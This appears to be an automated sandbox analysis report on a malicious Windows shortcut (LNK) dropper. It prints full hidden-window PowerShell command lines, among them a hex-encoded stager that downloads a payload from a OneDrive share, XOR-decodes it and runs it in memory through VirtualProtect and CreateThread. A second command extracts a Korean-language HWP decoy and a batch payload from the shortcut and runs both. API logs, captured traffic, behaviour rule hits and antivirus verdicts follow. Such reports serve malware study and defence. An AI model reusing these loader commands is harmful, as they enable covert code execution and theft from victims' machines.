303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$moni="""""";for($i=0;$i -le $saint.Length-2;$i=$i+2){$POLL=$saint[$i]+$saint[$i+1];$moni= $moni+[char]([convert]::toint16($POLL,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($moni));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($pull));while($true){};"
filepath_r: c:\Windows\SysWOW64\cmd.exe
stack_pivoted: 0
creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

CreateProcessInternalW

 thread_identifier: 2116
thread_handle: 0x00000084
process_identifier: 2548
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell -windowstyle hidden -command "$pull ="$saint="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F6170692E6F6E6564726976652E636F6D2F76312E302F7368617265732F75216148523063484D364C7938785A484A324C6D317A4C326B7663794642614668465745784B5530354E5546526D5457646F5A457875646D397A645545786348635F5A54317363556F776557552F726F6F742F636F6E74656E74223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$moni="""""";for($i=0;$i -le $saint.Length-2;$i=$i+2){$POLL=$saint[$i]+$saint[$i+1];$moni= $moni+[char]([convert]::toint16($POLL,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($moni));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($pull));while($true){};"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received G
Data received 
Data received 
Data received 0
Data received ê ‚ÿ˜ þNqÝÈg4åpžÞ›Gžäÿ»®ôµ¦xÕÌZêæïæ‚:¢Dы
Data received Z0u1ÌHÇÃgæÅþ£/Ér¯e&_zƒk2Ü`5¸}ªl #,ئD´š“PL$)áÜ
Data received ksôŠ÷þoRáõô8µ<ågÀ0×Y@UÈÖëÊ·Cƒ¢Þ'Š ¡µtO [“•î
Data received ]”¨¥ºU!а¶fá]•©5¸³]{üt 2!5ÕÊü¶zo¸ëªÎ|• —ßb¸
Data received MdZáâB¤+º@@Èý«åâ.àžšà„°DOWNGRD ŽH hWC.?D æÔ ”[»]ôÁsGçôÀÿ ƒ€ƒ0‚0‚g 3š -ä Ã÷¿$ÿš -0  *†H†÷  0Y1 0 UUS10U Microsoft Corporation1*0(U!Microsoft Azure TLS Issuing CA 010 230310085426Z 240304085426Z0g1 0 UUS1 0 UWA10URedmond10U Microsoft Corporation10Ustorage.live.com0‚"0  *†H†÷ ‚0‚ ‚°Xãw低kó$V5ZÕÿYE&~Ã>^ÛÖëÈ´ŽN~và¸ô"—~Ž3®y°Ø:±Ô«Eˆ@ð=+=Èt ÿïèûM§h¹çFÔqÕg¼§#¿Å•7—Ô1‘°å©¢mÕM•Ðúã¤ÐTÎ4¶Ã‹¾j鲎©¿øæ)±cYËüV¡ºÌˆ¸æ'{îvÌLn\ç˜Åâþ8Y)@uŽ÷> Í¿ÿ$왐q38¿‡T­Všö ‰‚ǧÁA%A–š‡˜<·Ô´Î~ úτæÜ 0ª±×Ë"Cä‹Èa¯k*|e”õÅYIU¡îˆ¶jÍ3½Å€í3̀•@B)£‚00‚,0‚€ +Öy‚p‚ljwîÍÐdÕÛÎÅ\·´Í¢2‡F|¼ìÞÃQHYFqµ›†ÊÃÊ]H0F!‹„ª#2bƒoÇj8-eDÚËyxÅù@ƒ¯‡™iáÊ!¯ §•a?ù3îxØZQØ}Hs€<xô™f͑yæwÚ¶¿k?µ¶"Ÿ›Â»\kèp‘ql»Q„…4½¤=0H×û«†ÊÃÊvH0F!»ðu۔ËíaŽíQ½ë@&h/z7 gÁU¯´„b6Ê!–Æúä>Ÿ-b4b/m¬|ÃÐYóJ[‶˜Í#&Âp“vUÔ6Jê ›W<SðÀä8xp%/£ªÓ †ÊÃÊÉG0E!©ñ¶ö^Ã#FÏ*¨‹Z¬imM ‚¡Ë™SӒ€€‡n .` µ’öeØÇ ä½7C 0ªÚûsUõõ¡ê Å,mþ0' +‚7 00 +0 +0< +‚7/0-%+‚7‡½×çëF‚.ŽÐ ‡ðÚ]‚„åi‚ó§>d%0®+¡0ž0m+0†ahttp://www.microsoft.com/pkiops/certs/Microsoft%20Azure%20TLS%20Issuing%20CA%2001%20-%20xsign.crt0-+0†!http://oneocsp.microsoft.com/ocsp0Uÿâ {ÓXД7êÜÈx'Å[K™0Uÿ°0‚ AU‚ 80‚ 4‚ l-df.live.net‚ l.live.net‚ api.live.com‚ api.live.net‚ docs.live.net‚skyapi.live.net‚api-df.live.com‚api-df.live.net‚docs-df.live.net‚skyapi-df.live.net‚ *.ra.live.com‚*.cobalt.df.storage.msn.com‚*.cobalt.df.storage.live.com‚*.cobalt.storage.msn.com‚*.df.storage.live.com‚*.df.storage.msn.com‚*.docs-df.live.net‚*.storage.live.com‚*.storage.msn.com‚*.users.df.storage.live.com‚*.users.df.storage.msn.com‚*.users.storage.live.com‚*.users.storage.msn.com‚*.df.policies.live.net‚df.policies.live.net‚*.df.settings.live.net‚df.settings.live.net‚*.df.livefilestore.com‚ apis.live.net‚*.apis.live.net‚*.bay.livefilestore.com‚*.livefilestore.com‚ssw.live-int.com‚ ssw.live.com‚df.storage.live.com‚*.sn2.df.livefilestore.com‚storage.live.com‚*.blu.livefilestore.com‚*.bn1.livefilestore.com‚*.cobalt.storage.live.com‚*.dm1.livefilestore.com‚*.docs.live.net‚*.policies.live.net‚*.settings.live.net‚*.sn2.livefilestore.com‚*.tuk.livefilestore.com‚policies.live.net‚storage.msn.com‚ dev.live.com‚oauth.live.com‚*.bn1301.livefilestore.com‚*.bn1302.livefilestore.com‚*.dm2301.livefilestore.com‚*.dm2302.livefilestore.com‚skyapi.skydrive.live.com‚settings.live.net‚*.bn1303.livefilestore.com‚*.bn1304.livefilestore.com‚*.dm2303.livefilestore.com‚*.dm2304.livefilestore.com‚*.by3301.livefilestore.com‚*.by3302.livefilestore.com‚*.snt002.df.livefilestore.com‚*.bn1303.df.livefilestore.com‚*.dm2303.df.livefilestore.com‚skyapi.newdrive.live.com‚skyapi.onedrive.live.com‚
Data received _ª•6Œ¶všàQ5™¯ƒ£æóx”BÍβE¬_$É8Jµ‚?sޟh®¸äþd¿s€
Data received »ê½æŽÆ}?IYNԟ¥šŠYaÀi&±~ SÁ6ì8 ö[ÇÄì£ßÞO|Ûï
Data received –!‘2îêÉo@þ¢˜=óOÚõW;ûFðj|‰.Ù{A†¹»ø²«œÚÔÇ.7¸çÃ
Data received ÜGàé>Ø2sZL2šbls‚woPÓµ â3‰À%¢ ˆ² »ñ%|ºR
Data received ÁˆKË®7¥@g(,²Ü2Bç}v•l‰G„ì^lcÃ÷¥•Å;&ãÿÕ)S†úð>b¯ 8ªÊi?Á Ã"êaÎ7o”"ö¾T®ö(£_hGÿ)É43ÅÓñIÀUL[ÃæƲاÜÑ5øזNA­Ñ<é8 Éöƒ?kNá°¤Ôné?i>Òa÷<ŸT6P!±¡ÿ–&¤¹ø`ø'ž"'ZïßN÷8ìŒrUÇ­EÌl :§¦¯L¨|†ðÑéà]¬&u`f¹ÀªyýܛFÈòâëç#XeF´ÆGÃ5o_QïHQ»ï[,‘Á#'5ÐEaćsq¼ÖûY@^u]FI/†:QÈE…03ªl%µÕ¡X12‚ÛæI›Ù¶VFcè7íŽö¨|âw r[ºÁzÖI£‚­0‚©0U ]סW•Û’Ï+ÐÇÂwÎr€v0U#0€N"T •æãnæúú¹í90Uÿ†0U%0++0Uÿ0ÿ0v+j0h0$+0†http://ocsp.digicert.com0@+0†4http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0{Ut0r07 5 3†1http://crl3.digicert.com/DigiCertGlobalRootG2.crl07 5 3†1http://crl4.digicert.com/DigiCertGlobalRootG2.crl0U 00g 0g 0 +‚70  *†H†÷  ‚%óaíT°JÃQÙtf"bKÇ @[‰¢/aŸ¤Ää2§®Î‚÷fõ¥"¦Àä†#'®—Þa‘ì¼ûÊ¡µøp@l+ҜJÔ”_™e4î×qsû˜^¬ÂcÁ2T`UF ˆ ¹˜“×|4€;ƆÖúa ÀÏA«P}a‚ò.4mS?ÈkÉ2ý°Lýcq_ £ýHÀvi$çœq%cŸM¦.Åó¶ja‚D“6,`þ•ï°xàyeö”$£¹%^÷"ÎæoP@ӌvr͉úCà#9C0µ7‰ÛÑ ü‡øsHU¶€'Êìm‘žŒƒ¡ ga(=èތaÙNO‡=knj³Ò`Í Ít¨6Ciÿ-yP>€?å|æ Ÿ ‘aB=Â5d¹¸ÀȋK—…œ 2¥Ïu‘t·§-ªÊ³*9ˆsèä»È²«Kº$ôÎû|4¼ €FÁí"ʝÐɘÖŸ‘4Ôü"œF&}yç” ‚ìy0øk¡¨Aêp“£§Ug£]ù5­ŽQ:wNOtÕÙ —89» e Poì¹{R •f-[TdJ)0ÐsTYQ>]BQ £©‘—øMX¯vºÝ‹O5§¹Ôo¡Ûç&g.˜Ò¡Æá6ùЕâá9°R"µg\Z]K~]@3¢æˆ'ê>—oðÑù]}OD»'f͕îmAmזñWP04„»zkÇÔöiNǝ ö©Ua±­¸Ó;àªwüDrå¸ch'Š2¢Åä²h3·ðT‚œSTét™³’HF3se˜Óbꃌõè
Data received gª÷Þ·°ùXñŽ ¾¬(7¸ø¥¥t½ è~OìœØ“#ч´d7“ŒTŠ
Data received j«ÆèC¶-bmUZš’päi”Š„ŸQûƒ´†VLÓüqÉa·±î—RÔa£kJE”G
Data sent sodZá¦ÑÙ£*ÓK§3ÿ¼‚ñæ3þéÂL´¡Ñ/5 ÀÀÀ À 28.ÿapi.onedrive.com  
Data sent fba«ç|ÒBe]D‹–%ô„±IBGQ'Q½_¹G§¹@vUÞ¡Üßµ:³à„ažÀ ÖìS è:ÖL¸hãD´ÈâÚ!9S‡¢‘o‘£ÿïœH-ýc<“ øÀöq0­õ?€ˆ"»+¶†BY×þ± î¯LXÖÄælðeÆHÁ•Öî PÏ O›2ÞO
Data sent “dZáÁ Ww"·\ûòU ü…o¥°ëd&çEFi̋=±Ù L–æӋüSI‹ºÐ8¼âfV¬°p»"œÀ/5 ÀÀÀ À 28.ÿapi.onedrive.com  
Data sent fba‰ Õ ¦ÑÑu®·* vÍ /·›= @­sü§µmŒQšŸ ¯¦ß&͍RËÏͬÔခ†cŠ .ð¦ÎUž24õÁÀÊÝî6׆#¥.S"+‡èT‹™0éI/·Æz¬ÊÛOƒo(כlˆJf;­ˆVðBDçó;¼k»öî¼nNuBxŸ¡®
Data sent “dZáÌë8<Z¿óŒ?+ԄFèÐ ™Œ ÃDÂåAS¢ Žî™/ôƒO-:ãKßG¤ê²vëñaƒ°Ú3ßK/5 ÀÀÀ À 28.ÿapi.onedrive.com  
Data sent fbaÆÊó0¤ê—‡¼tóXÒû⾧eµ.“_¯VýÅ[¤ßBX”R™]Yºäƒ’«–q¥›~µ ¡Jt4ÞëÌR:)S…h±W£y»åþaoÆØ26̏CnÔNüöÎÂÌ0S $¥<­òØßR“œ2ØPâ’Jåj°WX’¼þÙX×uxŸ@•¬1¸zãTw)•R
Data sent “dZá×ðä„©‹ä×Ðû"çlÒ¹x‰z^ˆ¼qpƒ\­ ‰Ÿœ8‚w†™ê ÝfšB²Ö)Âë æ2/5 ÀÀÀ À 28.ÿapi.onedrive.com  
Data sent fbaxŠ³]™°HËU|6 ®ÿ £¡òÛ~Gâ8 ŒyD¥z&(-:¾VJ“wÎ#»ÑŸ„Ð}‘'ýµ¯„~à•P¹·ªŸ¦èJ yAõŸ°·'àa%þu¼ú¤¡#A«^…˜)0š;¿¥Ü­SW÷èÿwiþä^þ- 4ɺ Lþã·C[ƒçõþȏ3Mü+å
Data sent “dZáâÔSB¸•1‘a ëZv_eiCÅDK… èÉ w?xìe¬S‹F:V†K¥úÌ7hÒ­£K x •G¥v/5 ÀÀÀ À 28.ÿapi.onedrive.com  
Data sent fba»­8#Ô Ø"( ø#UJÚ[º-Ú¤o™«˜¡{ú÷çÅ+o{¸Y“òP0BÚÆ È{^ÇÐþZuõ °|'êøŒ"rújƒZصõRtOÐg¯iØôµŠ?(==o0<²¬⸈ý́¯À( @4³SýA¬ !’¨}ߓ dzÍ¢é«~¥üì}#
Data sent “dZáíÙI¿† ä,ûså†pàåçL Ühû ) ŽH hWC.?D æÔ ”[»]ôÁsGçô/5 ÀÀÀ À 28.ÿapi.onedrive.com  
Data sent fba¢ v7PàæÜσ*uúDš„´Iì÷= ÿ·Ñzx—~À ò®4>ë³Ž|²Óÿ¼yFÚN_#¾køù3ü¿vôŽ†Ú×\šjÈ×ßK—_1Ñ¿„s÷7ŒÅ¨œ0‚î¬ ˆ¬t!|ˆ ºÌðZפlãØH(9¢‡0ññÄÎŽ'¦"BqLwœ#é
Data sent “dZáøg”קè÷Ë«€7‹U™Ö+Ñ%C”žÌ5X] ™Gߣï:<ž¥7¨‹×Ðr®"¾Üƒ„c:̎ï/5 ÀÀÀ À 28.ÿapi.onedrive.com  
Data sent fba¾4„€1;Ï'均 >óĹr3‹9 ¤Æ÷+®ôʐèy-~&•>d²§Ì4ώçFØÅFÐGd Ðì#¢òþv`ø}l˜¦]´Ôýãï ôk"ë.–Áutê½0aƒT†Úä‚VêЎLÃQaNwÔ¬´YÝVþj…`ËÔV&‚Hs¹%`C¸Ÿ\+vM
Data sent “dZâÝ>1 qñýÐéø<~â(ñò"·Ã~ÿÉä àÛ ÝM3,Û© yîx‘òĜ·rŠ¤NƙmL³/5 ÀÀÀ À 28.ÿapi.onedrive.com  
Data sent fbaIeâèÆ2Cß_ EŸÖfà WÀ$v@þÎ(õam(p^/]ò?]DKOú€áÄÂ7ô5¸ÑÕ{©™æY•'ÇÓï,Ì»{ÊÌ.Þàüx[¯¹òR |ü1«‘ô0¯GCdߥE Æi™¶’(ús=ºƒn!Ý@SÇh`ƒŽQRU`­)tŽƒí
Data sent “dZâo.°€>ø¾þâ-èí lÎK¢¼-EÔeï¹ 5±–*Q Óº<K1•Ò`º–Ž—½[„±t/5 ÀÀÀ À 28.ÿapi.onedrive.com  
Data sent fba“ìiّ.Gހ±àļÞbJ÷”/‚S$ڍlÏìmçf\˜Î(²›œBJ/š"€‚røgÖ C4mÎ#ۇ×W÷<”?p£#Çucÿø{; £]«†’ú”>þ–žÂá 0Õò„LqåX ܹœß²ª Üf·aél6d5¹>ÿâˆlW<±^q½íîêã*PÛpç
Data sent “dZâ9Ûó=.ÑAФö ÿALŸ6 8ÿœÝ¶8 7´\Yˆÿ(úØRmx+y³^—µ† Ö3R€/5 ÀÀÀ À 28.ÿapi.onedrive.com  
Data sent fba¤Lº :Ênéá.$Uªazö£´{%¢@«=Ý Uj6”µO0‹uÇö] ]eVÿ•ÌQÑå#Uƒ›r‡«H†¥ $hԆeäRK½RKȬ.Ú )kB—tiYc–óm0ª…Ù”€-ìö=X9øÌDÉ»¬œAÐ/b˜°8÷é™´@5Åß_rãq¶iOSP¥
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Create a windows service rule Create_Service
description Communication using DGA rule Network_DGA
description Communications over RAW Socket rule Network_TCP_Socket
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Steal credential rule local_credential_Steal
description Match Windows Http API call rule Str_Win32_Http_API
description Communications over P2P network rule Network_P2P_Win
description Match Windows Inet API call rule Str_Win32_Internet_API
description Escalate priviledges rule Escalate_priviledges
description File Downloader rule Network_Downloader
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description Take ScreenShot rule ScreenShot
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\mobuv0cw.cmdline"
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\owptouvz.cmdline"
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\hi1x_fj5.cmdline"
cmdline powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x00032CA73D} | Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00062888 -ReadCount 00062888; $pdfPath = 'C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp'; sc $pdfPath ([byte[]]($pdfFile | select -Skip 004008)) -Encoding Byte; & $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00066145 -ReadCount 00066145; $exePath = 'C:\Users\test22\AppData\Local\Temp\230509.bat'; sc $exePath ([byte[]]($exeFile | select -Skip 00062888)) -Encoding Byte; & $exePath;
cmdline "C:\Windows\SysWOW64\cmd.exe" /k powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x00032CA73D} ^| Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00062888 -ReadCount 00062888; $pdfPath = 'C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp'; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 004008)) -Encoding Byte; ^& $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00066145 -ReadCount 00066145; $exePath = 'C:\Users\test22\AppData\Local\Temp\230509.bat'; sc $exePath ([byte[]]($exeFile ^| select -Skip 00062888)) -Encoding Byte; ^& $exePath;
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\n5j0ib9u.cmdline"
FireEye Heur.BZC.YAX.Boxter.949.9B7AE7BC
ALYac Heur.BZC.YAX.Boxter.949.9B7AE7BC
Arcabit Heur.BZC.YAX.Boxter.949.9B7AE7BC
ESET-NOD32 LNK/TrojanDropper.Agent.DD
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan.WinLNK.Powecod.c
BitDefender Heur.BZC.YAX.Boxter.949.9B7AE7BC
Emsisoft Heur.BZC.YAX.Boxter.949.9B7AE7BC (B)
F-Secure Malware.LNK/Drop.Agent.VPVF
VIPRE Heur.BZC.YAX.Boxter.949.9B7AE7BC
Sophos Troj/LnkDrop-M
SentinelOne Static AI - Suspicious LNK
Avira LNK/Drop.Agent.VPVF
ZoneAlarm HEUR:Trojan.WinLNK.Powecod.c
GData Heur.BZC.YAX.Boxter.949.9B7AE7BC
Google Detected
MAX malware (ai score=89)
VBA32 Trojan.Link.Crafted
Time & API Arguments Status Return Repeated

send

 buffer: sodZá¦ÑÙ£*ÓK§3ÿ¼‚ñæ3þéÂL´¡Ñ/5 ÀÀÀ À 28.ÿapi.onedrive.com  
socket: 1328
sent: 120
1 120 0

send

 buffer: fba«ç|ÒBe]D‹–%ô„±IBGQ'Q½_¹G§¹@vUÞ¡Üßµ:³à„ažÀ ÖìS è:ÖL¸hãD´ÈâÚ!9S‡¢‘o‘£ÿïœH-ýc<“ øÀöq0­õ?€ˆ"»+¶†BY×þ± î¯LXÖÄælðeÆHÁ•Öî PÏ O›2ÞO
socket: 1328
sent: 166
1 166 0

WSASend

 buffer: GET /DigiCertGlobalRootG2.crt HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: cacerts.digicert.com
socket: 1916
0 0

send

 buffer: “dZáÁ Ww"·\ûòU ü…o¥°ëd&çEFi̋=±Ù L–æӋüSI‹ºÐ8¼âfV¬°p»"œÀ/5 ÀÀÀ À 28.ÿapi.onedrive.com  
socket: 1328
sent: 152
1 152 0

send

 buffer: fba‰ Õ ¦ÑÑu®·* vÍ /·›= @­sü§µmŒQšŸ ¯¦ß&͍RËÏͬÔခ†cŠ .ð¦ÎUž24õÁÀÊÝî6׆#¥.S"+‡èT‹™0éI/·Æz¬ÊÛOƒo(כlˆJf;­ˆVðBDçó;¼k»öî¼nNuBxŸ¡®
socket: 1328
sent: 166
1 166 0

send

 buffer: “dZáÌë8<Z¿óŒ?+ԄFèÐ ™Œ ÃDÂåAS¢ Žî™/ôƒO-:ãKßG¤ê²vëñaƒ°Ú3ßK/5 ÀÀÀ À 28.ÿapi.onedrive.com  
socket: 1328
sent: 152
1 152 0

send

 buffer: fbaÆÊó0¤ê—‡¼tóXÒû⾧eµ.“_¯VýÅ[¤ßBX”R™]Yºäƒ’«–q¥›~µ ¡Jt4ÞëÌR:)S…h±W£y»åþaoÆØ26̏CnÔNüöÎÂÌ0S $¥<­òØßR“œ2ØPâ’Jåj°WX’¼þÙX×uxŸ@•¬1¸zãTw)•R
socket: 1328
sent: 166
1 166 0

send

 buffer: “dZá×ðä„©‹ä×Ðû"çlÒ¹x‰z^ˆ¼qpƒ\­ ‰Ÿœ8‚w†™ê ÝfšB²Ö)Âë æ2/5 ÀÀÀ À 28.ÿapi.onedrive.com  
socket: 1328
sent: 152
1 152 0

send

 buffer: fbaxŠ³]™°HËU|6 ®ÿ £¡òÛ~Gâ8 ŒyD¥z&(-:¾VJ“wÎ#»ÑŸ„Ð}‘'ýµ¯„~à•P¹·ªŸ¦èJ yAõŸ°·'àa%þu¼ú¤¡#A«^…˜)0š;¿¥Ü­SW÷èÿwiþä^þ- 4ɺ Lþã·C[ƒçõþȏ3Mü+å
socket: 1328
sent: 166
1 166 0

send

 buffer: “dZáâÔSB¸•1‘a ëZv_eiCÅDK… èÉ w?xìe¬S‹F:V†K¥úÌ7hÒ­£K x •G¥v/5 ÀÀÀ À 28.ÿapi.onedrive.com  
socket: 1328
sent: 152
1 152 0

send

 buffer: fba»­8#Ô Ø"( ø#UJÚ[º-Ú¤o™«˜¡{ú÷çÅ+o{¸Y“òP0BÚÆ È{^ÇÐþZuõ °|'êøŒ"rújƒZصõRtOÐg¯iØôµŠ?(==o0<²¬⸈ý́¯À( @4³SýA¬ !’¨}ߓ dzÍ¢é«~¥üì}#
socket: 1328
sent: 166
1 166 0

send

 buffer: “dZáíÙI¿† ä,ûså†pàåçL Ühû ) ŽH hWC.?D æÔ ”[»]ôÁsGçô/5 ÀÀÀ À 28.ÿapi.onedrive.com  
socket: 1328
sent: 152
1 152 0

send

 buffer: fba¢ v7PàæÜσ*uúDš„´Iì÷= ÿ·Ñzx—~À ò®4>ë³Ž|²Óÿ¼yFÚN_#¾køù3ü¿vôŽ†Ú×\šjÈ×ßK—_1Ñ¿„s÷7ŒÅ¨œ0‚î¬ ˆ¬t!|ˆ ºÌðZפlãØH(9¢‡0ññÄÎŽ'¦"BqLwœ#é
socket: 1328
sent: 166
1 166 0

send

 buffer: “dZáøg”קè÷Ë«€7‹U™Ö+Ñ%C”žÌ5X] ™Gߣï:<ž¥7¨‹×Ðr®"¾Üƒ„c:̎ï/5 ÀÀÀ À 28.ÿapi.onedrive.com  
socket: 1328
sent: 152
1 152 0

send

 buffer: fba¾4„€1;Ï'均 >óĹr3‹9 ¤Æ÷+®ôʐèy-~&•>d²§Ì4ώçFØÅFÐGd Ðì#¢òþv`ø}l˜¦]´Ôýãï ôk"ë.–Áutê½0aƒT†Úä‚VêЎLÃQaNwÔ¬´YÝVþj…`ËÔV&‚Hs¹%`C¸Ÿ\+vM
socket: 1328
sent: 166
1 166 0

send

 buffer: “dZâÝ>1 qñýÐéø<~â(ñò"·Ã~ÿÉä àÛ ÝM3,Û© yîx‘òĜ·rŠ¤NƙmL³/5 ÀÀÀ À 28.ÿapi.onedrive.com  
socket: 1328
sent: 152
1 152 0

send

 buffer: fbaIeâèÆ2Cß_ EŸÖfà WÀ$v@þÎ(õam(p^/]ò?]DKOú€áÄÂ7ô5¸ÑÕ{©™æY•'ÇÓï,Ì»{ÊÌ.Þàüx[¯¹òR |ü1«‘ô0¯GCdߥE Æi™¶’(ús=ºƒn!Ý@SÇh`ƒŽQRU`­)tŽƒí
socket: 1328
sent: 166
1 166 0

send

 buffer: “dZâo.°€>ø¾þâ-èí lÎK¢¼-EÔeï¹ 5±–*Q Óº<K1•Ò`º–Ž—½[„±t/5 ÀÀÀ À 28.ÿapi.onedrive.com  
socket: 1328
sent: 152
1 152 0

send

 buffer: fba“ìiّ.Gހ±àļÞbJ÷”/‚S$ڍlÏìmçf\˜Î(²›œBJ/š"€‚røgÖ C4mÎ#ۇ×W÷<”?p£#Çucÿø{; £]«†’ú”>þ–žÂá 0Õò„LqåX ܹœß²ª Üf·aél6d5¹>ÿâˆlW<±^q½íîêã*PÛpç
socket: 1328
sent: 166
1 166 0

send

 buffer: “dZâ9Ûó=.ÑAФö ÿALŸ6 8ÿœÝ¶8 7´\Yˆÿ(úØRmx+y³^—µ† Ö3R€/5 ÀÀÀ À 28.ÿapi.onedrive.com  
socket: 1328
sent: 152
1 152 0

send

